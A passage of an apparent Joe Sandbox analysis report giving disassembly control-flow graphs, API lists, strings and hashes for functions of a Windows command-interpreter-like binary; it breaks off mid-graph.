460->446 460->452 469 7ff7cd49f1d1-7ff7cd49f1db 461->469 467 7ff7cd4954b4-7ff7cd4954f5 setlocale call 7ff7cd498f80 462->467 468 7ff7cd49f207-7ff7cd49f20e 462->468 463->449 463->458 464->455 465->464 470 7ff7cd49f163-7ff7cd49f16e 465->470 471 7ff7cd49f1b0-7ff7cd49f1bb 466->471 472 7ff7cd49f19a-7ff7cd49f1a1 466->472 477 7ff7cd49f211-7ff7cd49f21b 468->477 475 7ff7cd49f1f3-7ff7cd49f1fe 469->475 476 7ff7cd49f1dd-7ff7cd49f1e4 469->476 470->459 470->464 471->461 472->471 473 7ff7cd49f1a3-7ff7cd49f1ae 472->473 473->466 473->471 475->468 476->475 479 7ff7cd49f1e6-7ff7cd49f1f1 476->479 480 7ff7cd49f233-7ff7cd49f23e 477->480 481 7ff7cd49f21d-7ff7cd49f224 477->481 479->469 479->475 481->480 482 7ff7cd49f226-7ff7cd49f231 481->482 482->477 482->480
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InfoLocale$DefaultUsersetlocale
                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                        • API String ID: 1351325837-2236139042
                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction ID: b2babf9aa371426257b97580b03aacec08c68d66b1f47fcb807a0b6a28bfa055
                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction Fuzzy Hash: F6F14A21B0CA4295EF21AF12D5106B9B6AABF54BA0FD44136CF2D57694FF3CEA05C360
                                        Function 00007FF7CD494224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 483 7ff7cd494224-7ff7cd4942a5 InitializeProcThreadAttributeList 484 7ff7cd49ecd4-7ff7cd49ecee GetLastError call 7ff7cd4a9eec 483->484 485 7ff7cd4942ab-7ff7cd4942e5 UpdateProcThreadAttribute 483->485 492 7ff7cd49ed1e 484->492 487 7ff7cd49ecf0-7ff7cd49ed19 GetLastError call 7ff7cd4a9eec DeleteProcThreadAttributeList 485->487 488 7ff7cd4942eb-7ff7cd4943c6 memset * 2 GetStartupInfoW call 7ff7cd493a90 call 7ff7cd48b900 485->488 487->492 497 7ff7cd494638-7ff7cd494644 _local_unwind 488->497 498 7ff7cd4943cc-7ff7cd4943d3 488->498 499 7ff7cd494649-7ff7cd494650 497->499 498->499 500 7ff7cd4943d9-7ff7cd4943dc 498->500 499->500 503 7ff7cd494656-7ff7cd49465d 499->503 501 7ff7cd494415-7ff7cd494424 call 7ff7cd495a68 500->501 502 7ff7cd4943de-7ff7cd4943f5 wcsrchr 500->502 510 7ff7cd494589-7ff7cd494590 501->510 511 7ff7cd49442a-7ff7cd494486 CreateProcessW 501->511 502->501 504 7ff7cd4943f7-7ff7cd49440f lstrcmpW 502->504 503->501 506 7ff7cd494663 503->506 504->501 507 7ff7cd494668-7ff7cd49466d call 7ff7cd4a9044 504->507 506->500 507->501 510->511 514 7ff7cd494596-7ff7cd4945fa CreateProcessAsUserW 510->514 513 7ff7cd49448b-7ff7cd49448f 511->513 515 7ff7cd494672-7ff7cd494682 GetLastError 513->515 516 7ff7cd494495-7ff7cd4944c7 CloseHandle call 7ff7cd49498c 513->516 514->513 518 7ff7cd49468d-7ff7cd494694 515->518 516->518 522 7ff7cd4944cd-7ff7cd4944e5 516->522 520 7ff7cd4946a2-7ff7cd4946ac 518->520 521 7ff7cd494696-7ff7cd4946a0 518->521 523 7ff7cd494705-7ff7cd494707 520->523 524 7ff7cd4946ae-7ff7cd4946b5 call 7ff7cd4997bc 520->524 521->520 521->524 525 7ff7cd4947a3-7ff7cd4947a9 522->525 526 7ff7cd4944eb-7ff7cd4944f2 522->526 523->522 530 7ff7cd49470d-7ff7cd49472a call 7ff7cd48cd90 523->530 540 7ff7cd494703 524->540 541 7ff7cd4946b7-7ff7cd494701 call 7ff7cd4dc038 524->541 527 7ff7cd4945ff-7ff7cd494607 526->527 528 7ff7cd4944f8-7ff7cd494507 526->528 527->528 531 7ff7cd49460d 527->531 532 7ff7cd494612-7ff7cd494616 528->532 533 7ff7cd49450d-7ff7cd494553 call 7ff7cd495cb4 call 7ff7cd4933f0 call 7ff7cd49498c 528->533 548 7ff7cd49472c-7ff7cd494738 _local_unwind 530->548 549 7ff7cd49473d-7ff7cd494767 call 7ff7cd4913e0 call 7ff7cd4a9eec call 7ff7cd48ff70 _local_unwind 530->549 536 7ff7cd49476c-7ff7cd494773 531->536 538 7ff7cd4947d7-7ff7cd4947df 532->538 539 7ff7cd49461c-7ff7cd494633 532->539 565 7ff7cd494558-7ff7cd49455e 533->565 536->528 546 7ff7cd494779-7ff7cd494780 536->546 543 7ff7cd4947e1-7ff7cd4947ed CloseHandle 538->543 544 7ff7cd4947f2-7ff7cd49483c call 7ff7cd48ff70 DeleteProcThreadAttributeList call 7ff7cd498f80 538->544 539->544 540->523 541->523 543->544 546->528 552 7ff7cd494786-7ff7cd494789 546->552 548->549 549->536 552->528 557 7ff7cd49478f-7ff7cd494792 552->557 557->525 561 7ff7cd494794-7ff7cd49479d call 7ff7cd4aa250 557->561 561->525 561->528 568 7ff7cd494564-7ff7cd494579 call 7ff7cd49498c 565->568 569 7ff7cd4947ae-7ff7cd4947ca call 7ff7cd4933f0 565->569 568->544 576 7ff7cd49457f-7ff7cd494584 call 7ff7cd4aa920 568->576 569->538 576->544
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                        • API String ID: 388421343-2905461000
                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction ID: 955f4deb36f33b898e671ec2c20bc8e7eb73f5ef3a833e9643b8239704732ad8
                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction Fuzzy Hash: EAF14E31B0CA8295EA60AF52E444BB9F7A5FB857A0F844139DF6D42754EF3CE644CB20
                                        Function 00007FF7CD495554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 579 7ff7cd495554-7ff7cd4955b9 call 7ff7cd49a640 582 7ff7cd4955bc-7ff7cd4955e8 RegOpenKeyExW 579->582 583 7ff7cd495887-7ff7cd49588e 582->583 584 7ff7cd4955ee-7ff7cd495631 RegQueryValueExW 582->584 583->582 587 7ff7cd495894-7ff7cd4958db time srand call 7ff7cd498f80 583->587 585 7ff7cd49f248-7ff7cd49f24d 584->585 586 7ff7cd495637-7ff7cd495675 RegQueryValueExW 584->586 591 7ff7cd49f260-7ff7cd49f265 585->591 592 7ff7cd49f24f-7ff7cd49f25b 585->592 588 7ff7cd495677-7ff7cd49567c 586->588 589 7ff7cd49568e-7ff7cd4956cc RegQueryValueExW 586->589 593 7ff7cd495682-7ff7cd495687 588->593 594 7ff7cd49f28b-7ff7cd49f290 588->594 595 7ff7cd4956d2-7ff7cd495710 RegQueryValueExW 589->595 596 7ff7cd49f2b6-7ff7cd49f2bb 589->596 591->586 598 7ff7cd49f26b-7ff7cd49f286 _wtol 591->598 592->586 593->589 594->589 601 7ff7cd49f296-7ff7cd49f2b1 _wtol 594->601 599 7ff7cd495712-7ff7cd495717 595->599 600 7ff7cd495729-7ff7cd495767 RegQueryValueExW 595->600 602 7ff7cd49f2ce-7ff7cd49f2d3 596->602 603 7ff7cd49f2bd-7ff7cd49f2c9 596->603 598->586 605 7ff7cd49f2f9-7ff7cd49f2fe 599->605 606 7ff7cd49571d-7ff7cd495722 599->606 607 7ff7cd49579f-7ff7cd4957dd RegQueryValueExW 600->607 608 7ff7cd495769-7ff7cd49576e 600->608 601->589 602->595 604 7ff7cd49f2d9-7ff7cd49f2f4 _wtol 602->604 603->595 604->595 605->600 609 7ff7cd49f304-7ff7cd49f31a wcstol 605->609 606->600 612 7ff7cd4957e3-7ff7cd4957e8 607->612 613 7ff7cd49f3a9 607->613 610 7ff7cd49f320-7ff7cd49f325 608->610 611 7ff7cd495774-7ff7cd49578f 608->611 609->610 614 7ff7cd49f327-7ff7cd49f33f wcstol 610->614 615 7ff7cd49f34b 610->615 616 7ff7cd495795-7ff7cd495799 611->616 617 7ff7cd49f357-7ff7cd49f35e 611->617 618 7ff7cd49f363-7ff7cd49f368 612->618 619 7ff7cd4957ee-7ff7cd495809 612->619 620 7ff7cd49f3b5-7ff7cd49f3b8 613->620 614->615 615->617 616->607 616->617 617->607 621 7ff7cd49f36a-7ff7cd49f382 wcstol 618->621 622 7ff7cd49f38e 618->622 623 7ff7cd49580f-7ff7cd495813 619->623 624 7ff7cd49f39a-7ff7cd49f39d 619->624 625 7ff7cd49582c 620->625 626 7ff7cd49f3be-7ff7cd49f3c5 620->626 621->622 622->624 623->624 627 7ff7cd495819-7ff7cd495823 623->627 624->613 629 7ff7cd495832-7ff7cd495870 RegQueryValueExW 625->629 630 7ff7cd49f3ca-7ff7cd49f3d1 625->630 626->629 627->620 628 7ff7cd495829 627->628 628->625 631 7ff7cd495876-7ff7cd495882 RegCloseKey 629->631 632 7ff7cd49f3dd-7ff7cd49f3e2 629->632 630->632 631->583 633 7ff7cd49f3e4-7ff7cd49f412 ExpandEnvironmentStringsW 632->633 634 7ff7cd49f433-7ff7cd49f439 632->634 636 7ff7cd49f414-7ff7cd49f426 call 7ff7cd4913e0 633->636 637 7ff7cd49f428 633->637 634->631 635 7ff7cd49f43f-7ff7cd49f44c call 7ff7cd48b900 634->635 635->631 640 7ff7cd49f42e 636->640 637->640 640->634
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpensrandtime
                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                        • API String ID: 145004033-3846321370
                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction ID: e1c7cb2d574ece889a5a590aefa0558f7204a62cca21a1311226f46b0f8dcc6a
                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction Fuzzy Hash: 6AE1913262CA82D6EB60AF51E44057AF7A5FB98760FC01135EF9E02A54EF7CD644CB20
                                        Function 00007FF7CD4937D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 821 7ff7cd4937d8-7ff7cd493887 GetCurrentThreadId OpenThread call 7ff7cd4904f4 HeapSetInformation RegOpenKeyExW 824 7ff7cd49e9f8-7ff7cd49ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7cd49388d-7ff7cd4938eb call 7ff7cd495920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7cd49ea41-7ff7cd49ea59 GetThreadLocale 824->827 825->827 831 7ff7cd4938f1-7ff7cd493913 memset 825->831 829 7ff7cd49ea74-7ff7cd49ea77 827->829 830 7ff7cd49ea5b-7ff7cd49ea67 827->830 834 7ff7cd49ea94-7ff7cd49ea96 829->834 835 7ff7cd49ea79-7ff7cd49ea7d 829->835 830->829 832 7ff7cd49eaa5 831->832 833 7ff7cd493919-7ff7cd493935 call 7ff7cd494d5c 831->833 838 7ff7cd49eaa8-7ff7cd49eab4 832->838 841 7ff7cd49eae2-7ff7cd49eaff call 7ff7cd483240 call 7ff7cd4a8530 call 7ff7cd494c1c 833->841 842 7ff7cd49393b-7ff7cd493942 833->842 834->832 835->834 837 7ff7cd49ea7f-7ff7cd49ea89 835->837 837->834 838->833 840 7ff7cd49eaba-7ff7cd49eac3 838->840 843 7ff7cd49eacb-7ff7cd49eace 840->843 850 7ff7cd49eb00-7ff7cd49eb0d 841->850 844 7ff7cd49eb27-7ff7cd49eb40 _setjmp 842->844 845 7ff7cd493948-7ff7cd493962 _setjmp 842->845 846 7ff7cd49ead0-7ff7cd49eadb 843->846 847 7ff7cd49eac5-7ff7cd49eac9 843->847 852 7ff7cd49eb46-7ff7cd49eb49 844->852 853 7ff7cd4939fe-7ff7cd493a05 call 7ff7cd494c1c 844->853 845->850 851 7ff7cd493968-7ff7cd49396d 845->851 846->838 854 7ff7cd49eadd 846->854 847->843 863 7ff7cd49eb15-7ff7cd49eb1f call 7ff7cd494c1c 850->863 856 7ff7cd49396f 851->856 857 7ff7cd4939b9-7ff7cd4939bb 851->857 859 7ff7cd49eb66-7ff7cd49eb6f call 7ff7cd4901b8 852->859 860 7ff7cd49eb4b-7ff7cd49eb65 call 7ff7cd483240 call 7ff7cd4a8530 call 7ff7cd494c1c 852->860 853->824 854->833 864 7ff7cd493972-7ff7cd49397d 856->864 867 7ff7cd49eb20 857->867 868 7ff7cd4939c1-7ff7cd4939c3 call 7ff7cd494c1c 857->868 880 7ff7cd49eb71-7ff7cd49eb82 _setmode 859->880 881 7ff7cd49eb87-7ff7cd49eb89 call 7ff7cd4986f0 859->881 860->859 863->867 873 7ff7cd49397f-7ff7cd493984 864->873 874 7ff7cd4939c9-7ff7cd4939de call 7ff7cd48df60 864->874 867->844 877 7ff7cd4939c8 868->877 873->864 883 7ff7cd493986-7ff7cd4939ae call 7ff7cd490580 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 873->883 874->863 889 7ff7cd4939e4-7ff7cd4939e8 874->889 877->874 880->881 890 7ff7cd49eb8e-7ff7cd49ebad call 7ff7cd4958e4 call 7ff7cd48df60 881->890 898 7ff7cd4939b3 883->898 889->853 893 7ff7cd4939ea-7ff7cd4939ef call 7ff7cd48be00 889->893 902 7ff7cd49ebaf-7ff7cd49ebb3 890->902 899 7ff7cd4939f4-7ff7cd4939fc 893->899 898->857 899->873 902->853 903 7ff7cd49ebb9-7ff7cd49ec24 call 7ff7cd4958e4 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 call 7ff7cd48be00 call 7ff7cd490580 GetConsoleOutputCP GetCPInfo call 7ff7cd4904f4 902->903 903->890
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                        • API String ID: 2624720099-1920437939
                                        • Opcode ID: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction ID: 0fe49145f9bf2d30ca7e254681b1fa9e8ecc8978aa4994e345a10d6451e7baa3
                                        • Opcode Fuzzy Hash: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction Fuzzy Hash: 3FC1B231F0CA428AF714BF62A444978FAA6FF49774F844139DF2E46691FE3CA6418720
                                        Function 00007FF7CD49823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1118 7ff7cd49823c-7ff7cd49829b FindFirstFileExW 1119 7ff7cd4982cd-7ff7cd4982df 1118->1119 1120 7ff7cd49829d-7ff7cd4982a9 GetLastError 1118->1120 1124 7ff7cd498365-7ff7cd49837b FindNextFileW 1119->1124 1125 7ff7cd4982e5-7ff7cd4982ee 1119->1125 1121 7ff7cd4982af 1120->1121 1123 7ff7cd4982b1-7ff7cd4982cb 1121->1123 1127 7ff7cd4983d0-7ff7cd4983e5 FindClose 1124->1127 1128 7ff7cd49837d-7ff7cd498380 1124->1128 1126 7ff7cd4982f1-7ff7cd4982f4 1125->1126 1129 7ff7cd4982f6-7ff7cd498300 1126->1129 1130 7ff7cd498329-7ff7cd49832b 1126->1130 1127->1126 1128->1119 1131 7ff7cd498386 1128->1131 1132 7ff7cd498332-7ff7cd498353 GetProcessHeap HeapAlloc 1129->1132 1133 7ff7cd498302-7ff7cd49830e 1129->1133 1130->1121 1134 7ff7cd49832d 1130->1134 1131->1120 1137 7ff7cd498356-7ff7cd498363 1132->1137 1135 7ff7cd498310-7ff7cd498313 1133->1135 1136 7ff7cd49838b-7ff7cd4983c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7cd498315-7ff7cd498323 1135->1140 1141 7ff7cd498327 1135->1141 1138 7ff7cd4a50f8-7ff7cd4a511e GetLastError FindClose 1136->1138 1139 7ff7cd4983c8-7ff7cd4983ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1130
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 873889042-0
                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction ID: d5de5088dd78f0923a8a8dc46670348a4b58465f41d834724065a0b6555cb53e
                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction Fuzzy Hash: 28513A36B0DB4296E710AF16E444579FBA6FB99BA1F848131CF2D43350EF3CE6548620
                                        Function 00007FF7CD492978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1142 7ff7cd492978-7ff7cd4929b6 1143 7ff7cd4929b9-7ff7cd4929c1 1142->1143 1143->1143 1144 7ff7cd4929c3-7ff7cd4929c5 1143->1144 1145 7ff7cd49e441 1144->1145 1146 7ff7cd4929cb-7ff7cd4929cf 1144->1146 1147 7ff7cd4929d2-7ff7cd4929da 1146->1147 1148 7ff7cd4929dc-7ff7cd4929e1 1147->1148 1149 7ff7cd492a1e-7ff7cd492a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff7cd4929e3-7ff7cd4929eb 1148->1152 1150 7ff7cd492a44-7ff7cd492a5c FindClose 1149->1150 1151 7ff7cd49e435-7ff7cd49e439 1149->1151 1153 7ff7cd492a62-7ff7cd492a6e 1150->1153 1154 7ff7cd492ae3-7ff7cd492ae5 1150->1154 1151->1145 1152->1147 1155 7ff7cd4929ed-7ff7cd492a1c call 7ff7cd498f80 1152->1155 1156 7ff7cd492a70-7ff7cd492a78 1153->1156 1157 7ff7cd49e3f7-7ff7cd49e3ff 1154->1157 1158 7ff7cd492aeb-7ff7cd492b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff7cd492a7a-7ff7cd492a8d 1156->1161 1158->1153 1162 7ff7cd492b16-7ff7cd49e3f1 _wcsicmp 1158->1162 1161->1145 1163 7ff7cd492a93-7ff7cd492a97 1161->1163 1162->1153 1162->1157 1165 7ff7cd49e404-7ff7cd49e407 1163->1165 1166 7ff7cd492a9d-7ff7cd492ade memmove call 7ff7cd4913e0 1163->1166 1167 7ff7cd49e40b-7ff7cd49e413 1165->1167 1166->1152 1167->1167 1169 7ff7cd49e415-7ff7cd49e42b memmove 1167->1169 1169->1151
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction ID: b3cf702627eb1424f6585d36a976f923506730957eb3242a0acb53d3a9686309
                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction Fuzzy Hash: 8B510A22B0D68196EA30AF16A544A7AE296FB54BB4FC45230DF7E076D1FF3CE6418710
                                        Function 00007FF7CD494D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 643 7ff7cd494d5c-7ff7cd494e4b InitializeCriticalSection call 7ff7cd4958e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7cd490580 call 7ff7cd494a14 call 7ff7cd494ad0 call 7ff7cd495554 GetCommandLineW 654 7ff7cd494e4d-7ff7cd494e54 643->654 654->654 655 7ff7cd494e56-7ff7cd494e61 654->655 656 7ff7cd4951cf-7ff7cd4951e3 call 7ff7cd483278 call 7ff7cd494c1c 655->656 657 7ff7cd494e67-7ff7cd494e7b call 7ff7cd492e44 655->657 662 7ff7cd494e81-7ff7cd494ec3 GetCommandLineW call 7ff7cd4913e0 call 7ff7cd48ca40 657->662 663 7ff7cd4951ba-7ff7cd4951ce call 7ff7cd483278 call 7ff7cd494c1c 657->663 662->663 674 7ff7cd494ec9-7ff7cd494ee8 call 7ff7cd49417c call 7ff7cd492394 662->674 663->656 678 7ff7cd494eed-7ff7cd494ef5 674->678 678->678 679 7ff7cd494ef7-7ff7cd494f1f call 7ff7cd48aa54 678->679 682 7ff7cd494f21-7ff7cd494f30 679->682 683 7ff7cd494f95-7ff7cd494fee GetConsoleOutputCP GetCPInfo call 7ff7cd4951ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7cd494f32-7ff7cd494f39 682->684 689 7ff7cd494ff0-7ff7cd495006 GetConsoleTitleW 683->689 690 7ff7cd495012-7ff7cd495018 683->690 684->683 686 7ff7cd494f3b-7ff7cd494f77 call 7ff7cd483278 GetWindowsDirectoryW 684->686 695 7ff7cd4951b1-7ff7cd4951b9 call 7ff7cd494c1c 686->695 696 7ff7cd494f7d-7ff7cd494f90 call 7ff7cd493c24 686->696 689->690 692 7ff7cd495008-7ff7cd49500f 689->692 693 7ff7cd49507a-7ff7cd49507e 690->693 694 7ff7cd49501a-7ff7cd495024 call 7ff7cd493578 690->694 692->690 697 7ff7cd495080-7ff7cd4950b3 call 7ff7cd4ab89c call 7ff7cd48586c call 7ff7cd483240 call 7ff7cd493448 693->697 698 7ff7cd4950eb-7ff7cd495161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 706 7ff7cd495026-7ff7cd495030 694->706 695->663 696->683 724 7ff7cd4950d2-7ff7cd4950d7 call 7ff7cd483278 697->724 725 7ff7cd4950b5-7ff7cd4950d0 call 7ff7cd493448 * 2 697->725 703 7ff7cd49516f 698->703 704 7ff7cd495163-7ff7cd495167 698->704 710 7ff7cd495172-7ff7cd4951af free call 7ff7cd498f80 703->710 704->703 709 7ff7cd495169-7ff7cd49516d 704->709 711 7ff7cd495032-7ff7cd495059 GetStdHandle GetConsoleScreenBufferInfo 706->711 712 7ff7cd495075 call 7ff7cd4acff0 706->712 709->703 709->710 715 